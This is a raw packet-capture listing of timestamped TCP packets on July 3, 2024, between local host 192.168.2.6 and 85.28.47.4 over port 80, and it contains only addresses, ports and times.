Jul 3, 2024 18:08:25.028700113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.028738022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.044912100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.044924974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.044936895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.044985056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045006037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045070887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045082092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045092106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045103073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045119047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045149088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045298100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045308113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045317888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045327902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045337915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045348883 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045355082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045358896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045368910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045371056 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045399904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045422077 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045444965 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045620918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045640945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045651913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045661926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045672894 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045672894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045684099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045695066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045705080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045716047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045720100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045726061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045737982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.045756102 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.045780897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046122074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046132088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046142101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046152115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046161890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046173096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046180964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046185017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046195984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046205997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046212912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046216011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046227932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046236992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046245098 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046247005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046261072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046278000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046303034 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046622038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046633005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046642065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046652079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046663046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046674013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046678066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046684027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046694994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046700001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046705008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046715021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046725035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046730042 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046736002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046746016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046756983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.046772957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.046798944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047079086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047090054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047132969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047282934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047301054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047312021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047321081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047332048 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047333002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047343969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047354937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047364950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047368050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047377110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047389030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047399044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047405005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047409058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047420025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047430038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047439098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047449112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047460079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047461987 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047477007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047477007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047521114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.047970057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047986984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.047997952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.048027992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.048048019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.048058987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.048069954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:25.048099995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.048120975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.488080978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:25.493326902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:33.894469976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:33.896162033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:33.997443914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:34.002482891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:34.916898012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:34.917031050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:35.507653952 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:35.512619972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:36.564296007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:36.564357996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:36.895472050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:36.900295973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072345018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072372913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072384119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072395086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072402000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072407007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072413921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.072418928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072437048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072449923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072459936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.072495937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.072555065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072566986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072577000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072587967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072591066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.072598934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.072762966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.072763920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.154831886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154854059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154865980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154876947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154889107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154896021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.154901981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154927015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.154963970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154977083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.154988050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.154989958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155003071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155033112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155112982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155143976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155153990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155155897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155167103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155178070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155185938 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155198097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155230045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155366898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155378103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155395031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155407906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155407906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155421019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155426979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155442953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155457973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155467033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155483007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155493975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155503988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155515909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155518055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155527115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155538082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155539036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.155565977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.155587912 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.160543919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.160593033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237529993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237546921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237559080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237607956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237611055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237622976 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237633944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237637043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237646103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237658024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237684011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237711906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237724066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237735033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237746000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237761974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237829924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237829924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237901926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237914085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237924099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.237953901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.237982035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238023043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238035917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238048077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238059044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238070965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238075972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238101959 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238351107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238362074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238373041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238384008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238394022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238401890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238404989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238415956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238428116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238432884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238461018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238485098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238496065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238506079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238517046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238524914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238544941 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238569021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238578081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238651037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238706112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238717079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238728046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238739967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238750935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238758087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238760948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238780022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238795996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.238955021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238966942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238985062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.238996029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239001989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.239006996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239017963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239028931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239029884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.239038944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239049911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239051104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.239061117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239072084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.239072084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.239094019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.239113092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.240247965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.240258932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.240298033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320132971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320156097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320169926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320188999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320200920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320210934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320221901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320233107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320276976 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320338964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320349932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320359945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320368052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320379972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320394039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320537090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320549011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320560932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320585012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320614100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320656061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320669889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320710897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320718050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320722103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320732117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320754051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320776939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320851088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320862055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320872068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.320899963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.320923090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321105957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321116924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321135044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321146011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321154118 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321158886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321170092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321182013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321188927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321197033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321223021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321374893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321392059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321402073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321413040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321434021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321449995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321597099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321608067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321619034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321630001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321640015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321650982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321652889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.321661949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321672916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.321679115 CEST	49710	80	192.168.2.6	85.28.47.4
